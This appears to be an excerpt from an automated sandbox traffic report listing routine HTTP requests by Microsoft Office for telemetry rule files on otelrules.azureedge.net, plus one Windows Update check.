        Source: global traffic | HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1 | host: slscr.update.microsoft.com | accept: */* | user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Source: global traffic | HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
